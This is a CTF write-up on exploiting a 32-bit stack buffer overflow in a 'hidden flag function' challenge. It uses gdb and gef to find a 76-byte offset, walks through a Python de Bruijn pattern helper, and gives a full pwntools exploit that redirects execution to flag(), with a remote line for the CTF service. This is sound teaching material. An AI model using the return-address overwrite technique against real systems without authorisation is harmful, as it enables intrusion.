
Let's run it and see what we get

It just takes some input.
Let's use **gdb** (with **gef**) to analyze the binary.
First, find the function
`info functions`

So the function we want is at `0x08048576`
Next, find the offset from the start of the buffer to the saved return address
1. Create a pattern (gef generates a cyclic pattern in which every 4-byte window is unique)
`pattern create 100`
2. Run the program with **r** and paste that pattern in as the input
Nice! We get a **segfault**

**gdb** is telling us that the segfault is at `0x61616174`. Read little-endian that is the bytes `taaa`, a unique 4-byte slice of our pattern, so we can use it as the search parameter to find the offset
`pattern search 0x61616174`

There's our offset! **76**
We can test this by using **pi** (gef's inline Python) to generate a payload and feeding the output into the program.
`pi print('A'*76 + 'B'*4)`

If all goes well, it should fill the buffer with **41** bytes and overwrite the saved return address, and therefore the instruction pointer, with `0x42424242` *(A = 0x41, B = 0x42)*. If EIP holds anything other than four `42` bytes, the offset is wrong.

Cool, so we control the instruction pointer now.
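As an added example (not the writeup's own code, and not gef's or pwntools' source), here is a pure-Python stand-in for what `pattern create` and `pattern search` are doing under the hood, plus the payload layout used above. It builds the same lowercase de Bruijn sequence with 4-byte unique windows that gef and pwntools generate by default, looks the crashing EIP value up in it (little-endian first, since the target is 32-bit x86), and then lays out filler + return address the way the exploit does. It runs offline with no binary; the `0x61616174` value and `0x08048576` address are the ones from this writeup.

```python
# Added example: a pure-Python stand-in for gef's `pattern create` /
# `pattern search`, plus the filler + return-address payload layout.
# The pattern is a de Bruijn sequence over a-z with 4-byte windows, the
# same construction gef and pwntools use, so any 4 bytes that land in
# EIP after the crash identify exactly where in the buffer they came from.

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def cyclic_pattern(length: int, alphabet: bytes = ALPHABET, n: int = 4) -> bytes:
    """Return the first `length` bytes of the de Bruijn sequence B(len(alphabet), n).

    Every n-byte window in the sequence is unique, which is what makes the
    crash address map back to a single offset.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    seq: list[int] = []

    def db(t: int, p: int) -> None:  # FKM algorithm, emits Lyndon words in lex order
        if len(seq) >= length:       # stop early; we only need a prefix
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def pattern_offset(value: int, length: int = 100, n: int = 4):
    """Locate `value` (the EIP reported at the crash) inside the pattern.

    Returns (offset, endianness) or None. x86 is little-endian, so the bytes
    shown in EIP are the reverse of what sits in the buffer; gef checks both
    orders and so do we, but a big-endian-only hit is a sign you are reading
    the wrong register or looking at a partial overwrite.
    """
    pat = cyclic_pattern(length, n=n)
    for endian in ("little", "big"):
        idx = pat.find(value.to_bytes(n, endian))
        if idx != -1:
            return idx, endian
    return None


def build_payload(offset: int, target: int, filler: bytes = b"A") -> bytes:
    """`offset` bytes of filler up to the saved return address, then the
    target address in little-endian (what pwntools' p32() would produce)."""
    return filler * offset + target.to_bytes(4, "little")


def overwritten_eip(payload: bytes, offset: int) -> int:
    """The value a 32-bit `ret` pops if the saved return address sits
    `offset` bytes past the start of the buffer we just wrote."""
    return int.from_bytes(payload[offset:offset + 4], "little")


if __name__ == "__main__":
    print(cyclic_pattern(100).decode())
    print(pattern_offset(0x61616174))            # (76, 'little')
    sanity = build_payload(76, 0x42424242)       # same bytes as 'A'*76 + 'B'*4
    print(hex(overwritten_eip(sanity, 76)))      # 0x42424242
    print(build_payload(76, 0x08048576))         # real payload: filler + flag() address
```

The `0x42424242` sanity check is worth keeping as a function rather than a one-off: if `overwritten_eip()` of your test payload ever comes back as `0x42424241` or `0x41424242`, the offset is off by one and the real address will be misaligned in exactly the same way.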
Now that we know the **offset** and the **function address**, we can write an exploit.
Here's my code:
```Python
# pwntools gives us the process/remote tubes, p32() and gdb.attach()
from pwn import *

# local process for testing; swap in the remote() line when firing at the service
io = process('./hidden_flag_function')
#io = remote('1e9f746024b2e701.247ctf.com', 50254)

# 76 bytes of filler reach the saved return address, then the address of flag()
padding = b'A' * 76
funcloc = 0x08048576

# attach gdb so we can watch the return address get overwritten (comment out for remote)
gdb.attach(io)

# consume the prompt line the binary prints before reading input
io.recvline()

# send filler + the function address packed as 32-bit little-endian
io.sendline(padding + p32(funcloc))

# read back three lines of output; the flag should be in here
print(io.recvline())
print(io.recvline())
print(io.recvline())
```

Looks good! The output shows we landed in the `flag()` function, which called `fgets()` and then crashed. A crash after `flag()` finishes is expected here: we reached it with a `ret` rather than a `call`, so there is no valid return address on the stack for it to return to. As long as the flag is printed before that happens, it doesn't matter. Let's fire it at the service by uncommenting the `io = remote()` line, and commenting out the `gdb.attach(io)` and `io = process()` lines

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef
Related: